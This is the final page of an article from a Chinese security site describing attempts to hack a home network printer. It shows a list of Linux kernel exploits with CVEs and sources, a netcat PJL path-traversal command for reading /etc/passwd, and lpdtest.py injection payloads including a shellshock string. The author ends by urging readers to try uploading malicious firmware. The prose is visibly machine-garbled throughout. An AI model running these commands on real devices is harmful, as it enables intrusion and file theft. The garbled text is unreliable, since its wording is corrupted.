欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

网络打印机系统安全性技术分析与探讨专题

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814/
[+] do_pages_move
   Alt: sieve    CVE-2010-0415
   Source: Spenders Enlightenment
[+] half_nelson
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] half_nelson1
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] msr
   CVE-2013-0268
   Source: http://www.exploit-db.com/exploits/27297/
[+] pipe.c_32bit
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] ptrace_kmod2
   Alt: ia32syscall,robert_you_suck    CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023/
[+] rawmodePTY
   CVE-2014-0196
   Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[+] rds
   CVE-2010-3904
   Source: http://www.exploit-db.com/exploits/15285/
[+] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130/
[+] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024/
经由进程简略地阐发LES对象的输出成果,我决议承继测验考试其余办法。
直觉奉告我,为何再也不尝尝PJL呢?是以我应用netcat作为监听法式,并测验考试手动挪用一些敕令,履行敕令如下所示:
echo "@PJL FSUPLOAD FORMAT:BINARY NAME="../../etc/passwd" OFFSET=0 SIZE=648" | nc -v -v 192.168.1.108 9100
# If successful this should display the */etc/passwd* file.
或许
echo "@PJL INFO ID" | nc -v -v 192.168.1.108 9100
# If successful this should get the *printer’s device information*
在这个进程中我也测验考试了其余PJL敕令注入技巧,由于它们的敕令语法差别很大,加之我也不太懂得PS/PCL的启动,是以我的打印机对这类“入侵攻击”一点也没有反应。
 一个PRET剧本就能够搞定?
如上所述,PRET并不克不及用来“入侵攻击”我的家用打印机。但是我创造PRET源文件夹中有一个名为“lpdtest.py”的“暗藏”剧本,该剧本可以或许用来测试行式打印机后盾法式中较老的漏洞破绽bug,测试进程如下所示:
测验考试从打印机的文件体系获得文件,代码如下所示:
$ lpdtest.py printer get / etc / passwd
$ lpdtest.py printer get ../../../etc/passwd
#etc...
此测试对用户输出的数据(比方主机名,用户名,功课名,文件名等)停止fuzz处置。
# Test for environment variables
$ lpdtest.py printer in '$UID'
# Test for pipes and redirects
$ lpdtest.py printer in '| pwd'
$ lpdtest.py printer in '>> /etc/passwd'
# Test for backticks
$ lpdtest.py printer in '`ls`'
# Test for [shellshock (CVE-2014-6271)](http://seclists.org/oss-sec/2014/q3/650)
$ lpdtest.py printer in '() {:;}; /bin/ping -c1 1.2.3.4'
正如预期的那样,这些入侵攻击曾经被修复,应用该剧本仍旧没能胜利实行对打印机的入侵攻击把持。
总结
为何打印机遇被入侵攻击?
大多数打印机曾经和个人电脑或许办事器没甚么区别了!
打印机可用作端口/网络/漏洞破绽bug应用扫描器
用于盘算/哈希破解/嗅探
用于上传恶意病毒木马软件
用作C&C办事器
窃取未加密的数据
瞻望
假如我拿到一些更好的打印机,那末我将会承继在这些打印机上研讨无关打印机漏洞破绽bug应用的试验。假如我有更多的光阴,我会投入更多的光阴去研讨对上述家用打印机的漏洞破绽bug应用。比方捕捉固件更新,并测验考试对固件履行脱壳和逆向把持,但这些都必要投入更多的光阴去研讨和阐发。以是我如今坚持凋谢的心态,我盼望上述的研讨和阐发能让我坚持对打印机漏洞破绽bug应用研讨的兴致。别的,我盼望这篇文章可以或许赞助到那些对打印机漏洞破绽bug应用感兴致的人,并可以或许进修一些器械。以是假如你想研讨本身的打印机装备,Just do it!不外请牢记提示:
找到进入体系的一种办法,
反省应用的打印机说话,并测验考试上述这些代码注入技巧,
测验考试从Web界面dump文件体系目次布局,
假如可以或许,上传本身创立的“恶意病毒木马”固件,
找到一种新的漏洞破绽bug应用办法
末了,我等待着反应和改良倡议。

上一页  [1] [2] [3] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载